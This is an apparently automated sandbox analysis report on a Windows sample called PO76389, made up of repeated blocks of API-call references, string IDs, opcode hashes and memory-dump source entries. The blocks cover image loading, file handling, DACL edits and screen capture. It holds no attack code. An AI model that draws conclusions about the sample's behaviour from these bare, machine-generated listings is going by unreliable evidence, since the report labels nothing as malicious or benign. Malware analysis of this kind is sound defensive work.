                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0051E3BB
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0051BCBF), ref: 0051E417
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E457
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E49C
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E4D3
                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0051BCBF), ref: 0051E4DF
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0051E4EF
                                                    • DestroyCursor.USER32(?), ref: 0051E4FE
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0051E51B
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0051E527
                                                      • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 3907162815-1154884017
                                                    • Opcode ID: 599a78591ee8650666699d63ca4d70a5ac7d399f6d03849b518b6c316a3e3013
                                                    • Instruction ID: 14a875b681f639061b13ba64b19e781d27683cb3ad1016979f3b6fc6b71a9857
                                                    • Opcode Fuzzy Hash: 599a78591ee8650666699d63ca4d70a5ac7d399f6d03849b518b6c316a3e3013
                                                    • Instruction Fuzzy Hash: 9061AE71500215BAEF14DF64DC86FEA7BB8BB08714F10451AF915E71D0EBB8A980DBA0
                                                    APIs
                                                    • GetLocalTime.KERNEL32(?), ref: 00500EFF
                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00500F0F
                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00500F1B
                                                    • __wsplitpath.LIBCMT ref: 00500F79
                                                    • _wcscat.LIBCMT ref: 00500F91
                                                    • _wcscat.LIBCMT ref: 00500FA3
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500FB8
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FCC
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500FFE
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0050101F
                                                    • _wcscpy.LIBCMT ref: 0050102B
                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050106A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                    • String ID: *.*
                                                    • API String ID: 3566783562-438819550
                                                    • Opcode ID: f1facbc340de90488c069845f6ebd043d77edfe2be65099bd6e89c604317e2e1
                                                    • Instruction ID: 259401b8db66a9c536d40c3b4f1e96ad7d5a27e73d65f6bd8acd14f9ddddc00f
                                                    • Opcode Fuzzy Hash: f1facbc340de90488c069845f6ebd043d77edfe2be65099bd6e89c604317e2e1
                                                    • Instruction Fuzzy Hash: 78618CB6504705AFC710EF20C854A9EB7E8FF89314F00881EF98997291EB35E945CBA6
                                                    APIs
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • CharLowerBuffW.USER32(?,?), ref: 004FDB26
                                                    • GetDriveTypeW.KERNEL32 ref: 004FDB73
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBBB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBF2
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDC20
                                                      • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: e36f9071ca116a1242feb9b2ee5d1c87b1ae76a9f376f662e27cca435a7d3a82
                                                    • Instruction ID: 92dfcfc8430f73820e70bf4c7b366a0c775f33711e5a3189f99e54334ed21407
                                                    • Opcode Fuzzy Hash: e36f9071ca116a1242feb9b2ee5d1c87b1ae76a9f376f662e27cca435a7d3a82
                                                    • Instruction Fuzzy Hash: 8C514771504205AFC700EF11C9819ABB7F9FF88758F00486EF895972A1DB75EE0ACB66
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 004F3145
                                                    • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F314E
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 004F3170
                                                    • LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F3173
                                                    • __swprintf.LIBCMT ref: 004F31B3
                                                    • __swprintf.LIBCMT ref: 004F31C5
                                                    • _wprintf.LIBCMT ref: 004F326C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3283
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                    • API String ID: 984253442-2268648507
                                                    • Opcode ID: 021b772a0031c112d8d5a4cd935f62e4e5c78557238354118ae327c99ba33592
                                                    • Instruction ID: 825197bbeac793b1653b2394dcbcbd447a4ff6690cc61aa41457e70d9b8aa668
                                                    • Opcode Fuzzy Hash: 021b772a0031c112d8d5a4cd935f62e4e5c78557238354118ae327c99ba33592
                                                    • Instruction Fuzzy Hash: A641637190021DA6CB04FBE2DD86EEFB778AF14705F10046BF601B21A2DA696F08DA75
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004FD96C
                                                    • __swprintf.LIBCMT ref: 004FD98E
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD9CB
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004FD9F0
                                                    • _memset.LIBCMT ref: 004FDA0F
                                                    • _wcsncpy.LIBCMT ref: 004FDA4B
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004FDA80
                                                    • CloseHandle.KERNEL32(00000000), ref: 004FDA8B
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 004FDA94
                                                    • CloseHandle.KERNEL32(00000000), ref: 004FDA9E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: 60f2ad88392e71580294c5976d9598f634d9f2971ddd94583a06a7d0eedfb95b
                                                    • Instruction ID: d9a7e391e1c64afbccb4ed3cf81b14e8f87803592e1b1f3c0ae738b7e864f8b5
                                                    • Opcode Fuzzy Hash: 60f2ad88392e71580294c5976d9598f634d9f2971ddd94583a06a7d0eedfb95b
                                                    • Instruction Fuzzy Hash: FB31C87290020CABDB20DFA4DC49FEB77BDBF94704F0081A6F615D2260E7749A45DBA5
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0051BD04,?,?), ref: 0051E564
                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E57B
                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E586
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E593
                                                    • GlobalLock.KERNEL32(00000000), ref: 0051E59C
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5AB
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0051E5B4
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5BB
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0051E5CC
                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,0053D9BC,?), ref: 0051E5E5
                                                    • GlobalFree.KERNEL32(00000000), ref: 0051E5F5
                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0051E619
                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0051E644
                                                    • DeleteObject.GDI32(00000000), ref: 0051E66C
                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0051E682
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                    • String ID:
                                                    • API String ID: 3840717409-0
                                                    • Opcode ID: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                    • Instruction ID: 9844af0016f166d0c7f53f5b2eb47698fa0d1f85027bcf7366b8d65e5ac73891
                                                    • Opcode Fuzzy Hash: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                    • Instruction Fuzzy Hash: 9B414775600208AFDB119F64EC89EAFBBB9FF99715F108058F906D7260D731AD45EB20
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 00500C93
                                                    • _wcscat.LIBCMT ref: 00500CAB
                                                    • _wcscat.LIBCMT ref: 00500CBD
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500CD2
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500CE6
                                                    • GetFileAttributesW.KERNEL32(?), ref: 00500CFE
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00500D18
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00500D2A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: d941a217392c9e5d0db62b4f23e924b6eb6df45d224268d3a24b0fa43a9cc412
                                                    • Instruction ID: 9035e5c7dffc336b79db0604b6360ec0ec818193cfb9a5fa56a7e9de0bb77dc9
                                                    • Opcode Fuzzy Hash: d941a217392c9e5d0db62b4f23e924b6eb6df45d224268d3a24b0fa43a9cc412
                                                    • Instruction Fuzzy Hash: 608181715042059FD764DF64C844AAEBBE8BB89314F189D2EF885C72D1EA34DD84CBA2
                                                    APIs
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                      • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                      • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                      • Part of subcall function 004EB8E7: RtlAllocateHeap.NTDLL(00000000,?,004EB3CB), ref: 004EB923
                                                      • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                      • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                      • Part of subcall function 004EB982: RtlAllocateHeap.NTDLL(00000000,?,004EB3E1), ref: 004EB995
                                                      • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB5F7
                                                    • _memset.LIBCMT ref: 004EB60C
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB62B
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB63C
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 004EB679
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB695
                                                    • GetLengthSid.ADVAPI32(?), ref: 004EB6B2
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB6C1
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004EB6C8
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB6E9
                                                    • CopySid.ADVAPI32(00000000), ref: 004EB6F0
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB721
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB747
                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB75B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                    • String ID:
                                                    • API String ID: 2347767575-0
                                                    • Opcode ID: f5bc9b110eadc7d1b8f834f450e84f1e1cb21cb8c50ad47622c75a08c44987e9
                                                    • Instruction ID: 6c84a5bc43e2417e83d153ee0013836f26020c2d9307601bb530120de56e279d
                                                    • Opcode Fuzzy Hash: f5bc9b110eadc7d1b8f834f450e84f1e1cb21cb8c50ad47622c75a08c44987e9
                                                    • Instruction Fuzzy Hash: 05517D71900249ABCF049FA2DC89EEFBB79FF44745F04811AF911A6390D7349A05DBA4
                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0050A2DD
                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0050A2E9
                                                    • CreateCompatibleDC.GDI32(?), ref: 0050A2F5
                                                    • SelectObject.GDI32(00000000,?), ref: 0050A302
                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0050A356
                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0050A392
                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0050A3B6
                                                    • SelectObject.GDI32(00000006,?), ref: 0050A3BE
                                                    • DeleteObject.GDI32(?), ref: 0050A3C7
                                                    • DeleteDC.GDI32(00000006), ref: 0050A3CE
                                                    • ReleaseDC.USER32(00000000,?), ref: 0050A3D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                    • String ID: (
                                                    • API String ID: 2598888154-3887548279
                                                    • Opcode ID: ea1fb2718d7009968a79c786d3eb15fd41dd8a7171b80347fb865e02b4dcc2d1
                                                    • Instruction ID: ba8d197274adda968f6d601194e2de804e3aa196826ba52a737fcee9ad67b098
                                                    • Opcode Fuzzy Hash: ea1fb2718d7009968a79c786d3eb15fd41dd8a7171b80347fb865e02b4dcc2d1
                                                    • Instruction Fuzzy Hash: 65513875900309AFCB15CFA8D885AAEBBB9FF48710F14881DF95AA7350D731A945CB60
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EV
                                                    • API String ID: 3964851224-1416026000
                                                    • Opcode ID: 7fc54dd81ff3040913fa26723cb27796016d4f6deb4f9f281e0c5246b6b5cdd1
                                                    • Instruction ID: 876a9b93500ca7c123cbfc64231aa2e6786a13f7f900c73cedafc0b3a615c94b
                                                    • Opcode Fuzzy Hash: 7fc54dd81ff3040913fa26723cb27796016d4f6deb4f9f281e0c5246b6b5cdd1
                                                    • Instruction Fuzzy Hash: 3F41A5341002468BEF04EF04D860BEA3B62BF2539CF54482DFC525B295DB389E89CBA4
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00523C64,00000010,00000000,Bad directive syntax error,0054DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004F32D1
                                                    • LoadStringW.USER32(00000000,?,00523C64,00000010), ref: 004F32D8
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • _wprintf.LIBCMT ref: 004F3309
                                                    • __swprintf.LIBCMT ref: 004F332B
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3395
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"W
                                                    • API String ID: 1506413516-1713381306
                                                    • Opcode ID: 7c0225d3b82ab86f9ae904780cfe2115565a6521e2e008b3a4833ec123943feb
                                                    • Instruction ID: ea72c2f0fbeaa3913db87984497da93f9aa006f781ebda5892f86f018ddd4982
                                                    • Opcode Fuzzy Hash: 7c0225d3b82ab86f9ae904780cfe2115565a6521e2e008b3a4833ec123943feb
                                                    • Instruction Fuzzy Hash: F621A03190021DBBCF01EFD1CC06EEE7B35BF24705F00085BF505A11A1DAB9AA58DB64
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF), ref: 004FD567
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 004FD589
                                                    • __swprintf.LIBCMT ref: 004FD5DC
                                                    • _wprintf.LIBCMT ref: 004FD68D
                                                    • _wprintf.LIBCMT ref: 004FD6AB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
